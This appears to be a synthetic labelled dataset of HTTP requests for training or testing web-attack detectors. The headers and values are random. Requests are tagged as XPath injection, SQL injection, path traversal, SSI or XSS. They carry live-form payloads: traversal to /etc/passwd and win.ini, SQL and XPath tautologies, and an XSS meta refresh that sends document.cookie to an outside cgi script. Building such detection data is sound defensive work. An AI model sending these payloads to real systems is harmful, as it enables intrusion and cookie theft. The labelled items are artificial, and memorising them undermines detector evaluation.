Accept-Language: H7pia5Ah-unwisrn;q=0.4, setth-npwdRie7, zetv-nsTease, gaAulth-cinn, Ieteat-rnyeCzil
Cache-Control: max-age=12152
Client-ip: 9.220.179.73
Cookie: naieavesawfoime=apausrvd et=rcpboot.inin\Eapasswd;BBsock_streamIb=4uyaeaaen\
Cookie2: $Version="554"
Date: Fri, 10 Oct 08 03:24:51 CET
ETag: "KZmphrGa5e_XuG.bz"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Thu, 07 Aug 08 21:19:57 CET
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: *
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Thu, 04 Nov 04 14:20:29 GMT
Max-Forwards: 502
MIME-Version: 5.8
Pragma: ge9d='oai5l'
Proxy-Authorization: wXdaMt sohtZ=zc5ittfu
Authorization: Basic aHhtaHI6YW9zc3lv
Range: 11-,-9658
Referer: http://www.tTzaj0I.cz/mnii/ygpdaop/sddn44a.png
TE: gzip;q=0.1,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.7 (X11; U; Solaris 9.6; s8-an; rv:3.1.4) Gecko/74174108
UA-CPU: PowerPC
UA-Disp: 2667,8228,8
UA-Color: color32
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: roet/7.5, Xeuonr/9.7, oeer/4.8, opcsoe/4.8
Warning: 919 www.v8i3eh.html "hterlDuo" "Fri, 28 Oct 05 03:05:23 GMT"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37000
Start - Id: 49844
class: XPathInjection
GET /niaoaertslyerhmahnr/jaebTnoezere/o1u0UQFaUYxVPz@/eOApGqY/qG/N7udLs/sgsLDnNR8dnRev.jpg?Nate6=D%27&pcaatuzhhems=iih&7ag9rismfrbue0e=zevnvhsr+o&Hhft=e+zx&tnuntdhtRy=atfinsert&sdyT=5&aNaDAscde8htfa=hre4%2Fae&sscriptHv@=pl7&z@c-TsamvoIG@T=tordriRtqI&haE4hh=eg&lsiksMfp5anTztu=286&5emaetcr=o3t2ptse&vJ1perlpeIO5Lhome9=enm%2Fi%2FOatar%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+++++or+++%27lhern9%27+++%3D++++%27&sqod6euou2w=+%40 HTTP/1.1
Host: www.tceastf.gov
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, iso-8859-6;q=0.4, x-mac-icelandic;q=0.2, iso-8859-8-i, iso-8859-8;q=0.5
Accept-Encoding: 
Accept-Language: dvvttak-trtcrsja;q=0.8, eleS-tfafitao;q=0.4, r3gmnea-pesrExns
Cache-Control: no-store
Client-ip: 167.249.63.97
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Tue, 17 Feb 09 21:55:07 CET
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: ackeIlr=n1aE
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Thu, 21 Jul 05 01:11:55 CET
If-Unmodified-Since: Thu, 12 Jan 06 16:12:41 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: "YqnKb.9Hz0Noklq"
Max-Forwards: 6069
MIME-Version: 7.1
Pragma: 6N='m0cnwdc'
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="cmnoh"
Range: 376648-,445-
Referer: /tlhewe/teelcsba/4rr0oou4/TtmEmt3s/eb8dtsic.exe
TE: deflate
Trailer: Accept
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 4.5; Et-du; rv:0.2.9) Gecko/05813620
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 967x245
Via: 7.4 www.emxdo9.html, 0.2 102.24.240.116, ftoh/6.0 www.eodiin.css:8449
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49844
Start - Id: 39271
class: SSI
GET /ykqBJtlbBrcpt/eenoeTdf3heectibsre/pR3hoFZY8Lfhtsri/sdnaSTni_F/uAz@XL3EbbOfKjOG8g7.jpeg?TacwtoyW=1766366670&nlyihnse=91&ehDtEtr8o=zeeNw&nyenungrn=1420&ensO7gntatph=%3C%21--%23email+fromhost%3D%22www.eteebs.com%22+tohost%3D%22mailbox.Athnu.com%22+message%3D%22eo4o+g5us7em+lheteS+8gu%22+fromaddress%3D%22Yqksd.com%22+toaddress%3D%221oo.dzeni.com%22+subject%3D%22T%22+sender%3D%22jrse.com%22+replyto%3D%22t8tiOco.com%22+cc%3D%22es%22+inreplyto%3D%22hlait+Ecnu+e%22+id%3D%226ieqomail%22+--%3E&weiprsojs=suopen%25t&u2e63irehm=nvtfAte.8rlC&ak7ctoheh28g=%3BeAtalsrhnd+Hiu&y2=e4&X5Il3pAzhomeK=+&nefn5yMr=nk_-geSv0T&isdsa=bdNki&0eon=n4T%3Fajr&2RnjulGi9nsebA=Odl HTTP/1.1
Host: 160.165.235.175
Connection: close
Accept: text/*;q=0.2, video/*, application/x-tar
Accept-Charset: iso-8859-8, windows-1255, cp-936;q=0.0, x-mac-arabic, utf-7
Accept-Encoding: *
Accept-Language: e-9ouiel9, nmlo3ho-hlla;q=0.7, Uih-Wry7oR5, 0anexo-e;q=0.5
Cache-Control: only-if-cached
Client-ip: 37.187.22.142
Cookie: b0dynts6mo=dwekn4m8sawoh;t0hGfwhsa=h2te hi9mz)na;4T@xDhttpse_7t=ac
Cookie2: $Version="1"
Date: Sun, 18 Jan 09 08:25:42 CET
ETag: W/"dTX0RPI69X0Rz8hkyf"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: erhT@noAtt.uk
If-Modified-Since: Wed, 28 Nov 07 18:22:28 GMT
If-Unmodified-Since: Mon, 21 Jan 08 23:41:01 GMT
If-Match: "KMnr0iZZlp0QeiJv9"
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: "yN36kgKImrjW6fC7"
Max-Forwards: 0831
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM c29NZW9pZGFjaHJzckNjZTZzZWFwcGlhcmVzdnVlanRzaWlwU293YW9hdQ==
Range: 828-
Referer: /7DHd7n/ot30fut.tar
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.0 (X11; U; Open BSD i386 0.7; 3f-we; rv:4.2.5) Gecko/84461196
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 7.0 62.187.37.158, 0m8r5/0.2 www.ultl.png, 8.5 173.163.244.239:20906
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 04901
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39271
Start - Id: 47195
class: XSS
GET /8ddpvhtta/s5a_7T9tgYbmr/fScZm2tx7/1tUKh/mbn/rCN0.Ec-0u4.@nM_D/nF9GHI.swf?aiomdSnruIfhbbn=e%3Di&watalnRnreOi=tlogMutmoresplikedb&0JVQ0fF=+6+ag&aease=1608&8ncri4eei=aogperlhbfetalwhere%5Dbi&nareOq7re=%3Cmeta++++http-equiv++++%3D+++%22++refresh++%22+++++content%3D+%22+0%3Burl%3Djavascript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.taer.com%2Fcgi-bin%2Fnt.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&ejhtbnalenaahre=u+hfah&seeiuYse6io=310148 HTTP/1.0
Host: www.OthVlfn.de
Connection: keep-alive
Accept: video/*;q=0.9, application/*;q=0.9, application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: zrd-p2, zypon-e;q=0.5
Cache-Control: min-fresh=9
Client-ip: 34.140.216.85
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Mon, 25 Sep 06 06:30:33 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: 100-continue
From: odfe4mcc@abteyQ.be
If-Modified-Since: Tue, 19 Jun 07 18:03:16 UTC
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: "RRAglu8YSeaNw1b6Zc@C"
If-None-Match: *
If-Range: "G9O3hqgp05TOaS-"
Max-Forwards: 666
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest realm
Range: 62-80366,-217,68-
Referer: /nhnetis/Nncnn/yzccyswm.php4
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: phm8h (37Chj1; m7dz2-; nBI.qEo; eBhTM_)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47195
Start - Id: 45857
class: PathTransversal
GET /lsrecajtl/2DvA7cCr2XCtnW5ujIm/1E@OSr2DXe03X/wBht5@9myPtKXsUp4.jpg?SRUQ6W.mG=zutzpsa+ctu&bv56hd0=acnOhaImtk&sfHvor=78&E7htacces-=%3Cm%40&y5a=t%5Dael&.fgl=caeh&me9kteokmoRt=nyeuh&ae=fanyHqzl&ureMcso=pthsVx&f2Dp56uXdiv=s5LkCezxzr2&me08t1Es00=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fentomaniar%2For%2Fllsitier%2Fndng.jsp&tj6Ul=oxmf%40&fyb0t=rodd%28Rihavingyn%40w&leAsmtlii=rjdr&ptgzwqpPm=uLoodnph-yc%24i%24aeost HTTP/1.0
Host: 101.187.154.203:02331
Connection: close
Accept: text/*, text/*, text/*
Accept-Charset: iso-8859-4;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 136.24.127.56
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="19"
Date: Wed, 06 Apr 05 15:55:04 GMT
ETag: W/"38BwxJI.e-84qnO"
Expect: bdoS33=taFbsh3n;taft=Waes
From: emalit@e3Ooine.st
If-Modified-Since: Sun, 01 Aug 04 14:09:35 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Jan 06 22:46:10 UTC
Max-Forwards: 2405
MIME-Version: 2.1
Pragma: 02Twseeu='b7e'
Proxy-Authorization: NTLM YW92MnNzYWEwU0JobkFhbnlBZ2VjdDF0cmljZm43cHFFc2xydXJubVJudHBa
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://seg3c.fr/oauEe/a9eka/hoektl.fgf
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: idt0orh/1.9.6
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0549x672
Via: 0.7 38.167.209.8:07939, FTP/9.9 51.4.112.140, HTTP/7.0 www.ondslyip.css
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45857
Start - Id: 45137
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.td13uqorw.biz
Connection: close
Accept: text/html
Accept-Charset: iso-8859-5;q=0.4, x-mac-arabic;q=0.9, euc-cn;q=0.1
Accept-Encoding: identity, deflate, compress;q=0.0
Accept-Language: t-sossgre
Cache-Control: no-store
Client-ip: 217.130.119.31
Cookie: 0jBVf05VtRB9=6KitleDp;adTq4=ssma;access_logtpassthruYWc=3;ewMtehq1dncio1=r~sEcrGemininclude
Cookie2: $Version="6"
Date: Fri, 25 Apr 08 07:34:07 CET
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: ydgsh@esUe.cz
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Feb 09 01:03:48 UTC
Max-Forwards: 064
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Digest algorithm=aozyppmt
Range: -3,456-488022
Referer: /ssNn.gif
TE: trailers,trailers
Trailer: Host
User-Agent: 8ekntu (sV@3ilayY; tU2tsFG1Fw; eRg@RIvD_c; byd5Eo7WC.)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/5.1 www.g5auc2a.htm:90315
Transfer-Encoding: gzip
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45137
Start - Id: 35977
class: PathTransversal
GET /uotigrkNDKU480Nu2uq/cd2QsBlibunion/up8xWagu6Fc3HJ7fY/ntHtaa/heepNhthsdoxS7seEols/sHSVvJMcn4/0H40lfDYo.1G0t-j6P9Z.shtml?dIaG1892i7h=3454264&lgulr=qE-FmaE%40P&MS2logWJY3wKW=ymenoa8rcne&esIemtint=+ri&liic=ETEls%40wu-h2&ia2dqeumesaSp=onrl5rR&bdiz=84864&tot3hEdaaeq=f%25rtthvvhnr5%24e&rehrinuan=suvbscriptiN&u79iraarNos2=trcpk&eosNnjNdzn=ueecJ HTTP/1.1
Host: www.SvigOSrhnk.uk
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.4, identity
Accept-Language: cnelnf-7utLdeS, eynvdh-7im, y-03dc;q=0.9, ttst-rF;q=0.4, rncr-earmiHl
Cache-Control: bs0=nehia
Client-ip: 249.245.254.150
Cookie: reAt4u9=..........................WINNTsystem.ini;9a81Gutm=f lu;idwsew79erh=s8atzfmctspsluicRr;otNeLrtRx9a2het=metac mcinputminiiOzirphpi;dpo11w44emct=41831;cteitLtuheibTs=UmtfecdlAwiov
Date: Sun, 18 Nov 07 17:51:30 UTC
Expect: 100-continue
From: xbaede@eaenuse.biz
If-Modified-Since: Tue, 01 Aug 06 24:24:34 GMT
If-Unmodified-Since: Mon, 09 Oct 06 18:51:46 GMT
If-Match: *
If-None-Match: *
If-Range: "OnNIXXkxDF7vB@FrV"
Max-Forwards: 7654
MIME-Version: 8.8
Pragma: no-cache
Authorization: 6zaa tgTetvpd=baprQaae
Referer: http://auto.net/hnthly.txt
Trailer: User-Agent
User-Agent: erijNLrnd (tYGiYbt; huco9S)
Via: HTTP/4.0 www.enthhn.css
Transfer-Encoding: compress
Warning: 265 135.60.248.209 "Eahotew" 
X-Forwarded-For: 151.104.121.13
X-Serial-Number: 17563
----: -------------

null

End - Id: 35977
Start - Id: 41543
class: SqlInjection
POST /hsxfaBWvPO0iG/lIbK@ko.mdb? HTTP/1.0
Content-Length: 298
Content-Language: e87reold
Content-Encoding: gzip
Content-Location: http://www.alnte.be/ea7vta/3cpfhsd/ospl1.exe
Content-MD5: ZXNuZ2RSbXR0Z2k1MHRzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Feb 04 22:57:46 UTC
Last-Modified: Tue, 12 Apr 05 06:59:27 UTC
Host: 164.178.97.177
Connection: close
Accept: video/*
Accept-Charset: macintosh, x-mac-ce;q=0.2, x-mac-hebrew;q=0.6, iso-8859-1, cp-950;q=0.1
Accept-Encoding: *
Accept-Language: eoU-oqA3;q=0.2, enestHno-tniitydm, Aletowg-sr4oah;q=0.3, oeE9nAp-wsh
Cache-Control: no-store
Client-ip: 163.65.132.10
Cookie: oo=ohe6letixnouhi;iA7heemSe5Oa7e3=45;JED1@Pdelete=pAaodaezwinfrometw;f0xZt-W9kL=otinTm6eh3c8;rNhkoe=U<s
Cookie2: $Version="56"
Date: Fri, 25 Jul 08 22:54:27 CET
ETag: "qo-CqRFe0Y2GKt.7"
Expect: 100-continue
From: nqoEyii@sdULboEa.uk
If-Modified-Since: Sun, 26 Apr 09 23:35:43 GMT
If-Unmodified-Since: Fri, 06 Feb 09 14:21:04 CET
If-Match: *
If-None-Match: *
If-Range: "EgnwBj1bWO_2vgcmBz"
Max-Forwards: 44
MIME-Version: 5.5
Pragma: 7wtaiorh=tdpcymln
Proxy-Authorization: NTLM VGlESGVlZTFrMWFGNDJmbTltdDVMbzdzcmJ0dGU1d2hvaGVO
Authorization: Basic Mmx3dGF3ZWE6aGVnc0U=
Range: 57094-3
Referer: http://www.ei8erq6.com/nDb05td.asp
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/1.8 (compatible; MSIE 0.3; Win98; g1lrrnl; eu7ts)
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: deflate
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 751 www.Lnbf.js "segwzwse" 
----: ----------

ioeolti12=cdn+\&rhrt05ePu5i=boRTI&iecTeoS=o<aoa&I1='   OR '1e0wtLea'   LIKE     'aze%25&pkolh=ncsity4dsziihojziE&nEdndcmn5h=902&ezrnyBoitelno=pisna&dHraoo=70564869&TpmpttL=hh&&WkIgZ.5wALrE=3&Ehrxtn=8088&xxinlibphpSkmm=nl0iframes&crNeADeR8Stt=iu%etnnut5ubh&olw49gltalatl=53097813

End - Id: 41543
Start - Id: 46366
class: PathTransversal
GET /mAVfd9t/ztMskoSa6/zsoatyeojd8tNeieia/fmad05_ddooYqLHkgx.jsp?7qEI29raccess_log7IT=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&tIrf9nRohO=430&OlChbzob=7839&ehi=%29eoei HTTP/1.0
Host: 70.141.42.109:80
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: hz-gb-2312, windows-1254, euc-jp, x-mac-cyrillic
Accept-Encoding: identity;q=0.3, deflate, compress;q=0.9, compress;q=0.4
Accept-Language: o-2keqSqs5;q=0.3, iz-nnEoS, 4ei8se-iace17tg, 7aeo-nes;q=0.8, tipmassH-t55;q=0.7
Cache-Control: Tuoed4i='dla'
Client-ip: 214.183.248.166
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="64"
Date: Thu, 27 Oct 05 02:08:30 CET
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: f4eai5=rspwo;urlr=7czuo
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Mon, 15 Sep 08 20:12:33 CET
If-Match: "c1IzCSR.5lgREbk.Y"
If-None-Match: "lous4WLlncNNBsyUDhP"
If-Range: "2YfWYEazuVfbd5r3"
Max-Forwards: 93
MIME-Version: 1.9
Pragma: blaybao=o3ucr
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: NTLM dUg5aXJFbW9odmxvZTJzeWV0ZTdhdGFkcjVhZGhzdHBFenl0bA==
Range: 405245-17797
Referer: http://www.hrfduge.ch/s3le4.gz
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: naUNhm http://www.H6cbe.biz
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: FTP/5.0 www.ekEdy.png, HTTP/1.8 www.Kawrss.css, 3.5 www.nrdeC9n.shtml
Transfer-Encoding: stg2; llfa=ecsm
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46366
Start - Id: 35623
class: XPathInjection
GET /as2oneSdiOzhportsvS/pf2qjnEeoTtKrssa4oe.jpeg?t1he7ir0r=07557+++++or+++ot%2FnIn%2Fanhsr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D39%5D+or++708%3D&iee=nz6 HTTP/1.0
Host: www.e8snelIw.be
Connection: cputt
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: wSnB-eisg25;q=0.2, tzcsn-iesh
Cache-Control: max-stale
Client-ip: 254.148.190.50
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Sat, 02 Dec 06 12:14:39 CET
ETag: W/"xTHpvz5ahfoa5jv_KuRj"
Expect: arecso=imaEbd
From: xrco@ssnn.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Wed, 02 Jul 08 18:01:30 GMT
If-Match: "U-Ntndda.Irh0gL90"
If-None-Match: *
If-Range: "8yVtEN5.enmBAddtE"
Max-Forwards: 440
MIME-Version: 3.8
Pragma: 1de='dfdiag'
Proxy-Authorization: Basic V2VvMWJ0OjMzcGFycmN0
Authorization: NTLM ZU9nYm9zdGUwdU1ib2VldG1yb2RpaWRkQ2RnZGxyTGlmdHJOQmFzdG50
Range: 7528-,849-
Referer: /rBdcats3/loRpse/eohciou/eoderhi/htselsaR.tiff
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 5.4; hj-Gi; rv:8.3.3) Gecko/42042574
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 7.4 4.92.172.173:6109
Transfer-Encoding: cpOn
Upgrade: sivn/3.0
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35623
Start - Id: 48618
class: XPathInjection
PUT /pa3niennamseo/hbvsCecgSiiJDes.asp? HTTP/1.1
Content-Length: 283
Content-Language: djEoaaaC,nrt2
Content-Encoding: deflate
Content-Location: http://niriTlA.uk/nnezeE.asp
Content-MD5: Zm5tdjZlaWxsYWhucHMxbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 19 Dec 06 16:49:46 GMT
Host: 37.78.174.125
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.3
Accept-Language: phtcdfep-toe9;q=0.4, Ddninti-r;q=0.5, dttodo-m;q=0.6, rH-h;q=0.2, trles-3NlntnH;q=0.2
Cache-Control: only-if-cached
Client-ip: 74.177.18.101
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Sat, 02 Jun 07 14:13:39 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: ewioailt@flio7hb.com
If-Modified-Since: Wed, 04 Feb 09 09:04:53 GMT
If-Unmodified-Since: Wed, 24 Mar 10 08:07:47 UTC
If-Match: "BYvSWUPhani0Q3YK"
If-None-Match: *
If-Range: Fri, 28 Mar 08 09:59:35 CET
Max-Forwards: 75
MIME-Version: 7.4
Pragma: iuide9='Wte5at'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: 2h3a NzoO=ebtbb
Range: 3-574
Referer: http://nbden.org/irghEts.fgf
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: n@mEnvLkgD http://www.y7o1.gov
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: deflate
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ee2ieesuun=h&lIZmbgsoundvM=nm_fO&t1abmlthdepmn=iceeb5ittsjen0cs&st=6022913&iftpjp=nme/reisn/rtbon/child::node()[   position()=5]    | ceeo/ijmhE/n/child::text()[position()=1]    or 'Rq0el'= '&e9O=lZnino0mto&eyInB=jx7MKEP0t4ZA

End - Id: 48618
Start - Id: 45097
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.1
Host: www.reerIodsn.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 217.208.54.150
Cookie: 6fofT3ben=gqQo1;ea1smudacAs=rmOwTnha3dt 
Cookie2: $Version="8"
Date: Sat, 12 Feb 05 10:33:04 CET
ETag: "NeIswK_7a5EBHO2LNI"
Expect: 100-continue
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Dec 08 14:09:46 UTC
If-Unmodified-Since: Tue, 18 Mar 08 17:40:36 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: "ZHy-pjtF1MGg5VR"
If-Range: Thu, 03 Sep 09 08:05:08 UTC
Max-Forwards: 958
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic TnBudDpyclRlRWhl
Authorization: Basic T2UzdHNiZUw6ZXN2NnVT
Range: 61-,599945-,96-
Referer: /Eectrerl/fotJho/pnNmtCpw.sh
TE: gzip;q=0.6,trailers
Trailer: Connection
User-Agent: coadmsng0Ucatmah
UA-CPU: StrongARM
UA-Disp: 631,9480,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 211.43.232.104
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45097
Start - Id: 41264
class: SqlInjection
GET /d.OqS_D/isnIureeea7lotwisEhc/a3MNo9lt8L2M15sP/iv.2.php?jero=06231&nWaeceqtou=sX1&rathoihsSeohe=ieoddf&0QIX=02&rKDiinn=iboot.inih+&nan=ede6-lqo%7Ea HTTP/1.1
Host: 215.66.150.141:80
Connection: close
Accept: text/plain, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.5
Accept-Language: youa-oa;q=0.0, i-tiaesl
Cache-Control: max-age=3
Client-ip: 128.207.222.170
Cookie: gizgfoute13i=00493;iwKh2vS9xevalX=f44nff;ih5onn=OR   'pebAtk'   =   '   ';b6MwI=275093
Cookie2: $Version="86"
Date: Fri, 27 Nov 09 02:05:00 CET
ETag: W/"nZaTpczC2PCs-IFF59Hb"
Expect: rdeynh=7d8raewn;n2thoq=Wobroer
From: sadkb6h@raise.cz
If-Modified-Since: Wed, 12 Dec 07 05:26:22 UTC
If-Unmodified-Since: Mon, 28 Sep 09 16:00:37 UTC
If-Match: "jkx9nvTegIvEZ15F5"
If-None-Match: "buP_y3FE4cCs-O64"
If-Range: *
Max-Forwards: 5288
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest username="htctmgeT"
Authorization: Digest realm
Referer: /r6eTye/tdaobey/ogxst/tyxuAtd.jpeg
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: cetx0c (teuPdU; et0RRh9; 2irTbaSbK; mI7mizDGN_; hMJ9N6HTY)
UA-OS: Win9x
UA-Pixels: 557x1445
Via: 5.9 200.252.40.231, HTTP/0.8 www.fwmm.shtml:932
Transfer-Encoding: gzip
Upgrade: iyhnr/0.0, awhact/3.4, e1delp/1.8, 3goK/3.2, deeso/8.6
Warning: 519 217.122.200.168 "6se8ge5cmOttd" "Mon, 03 Apr 06 24:00:47 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
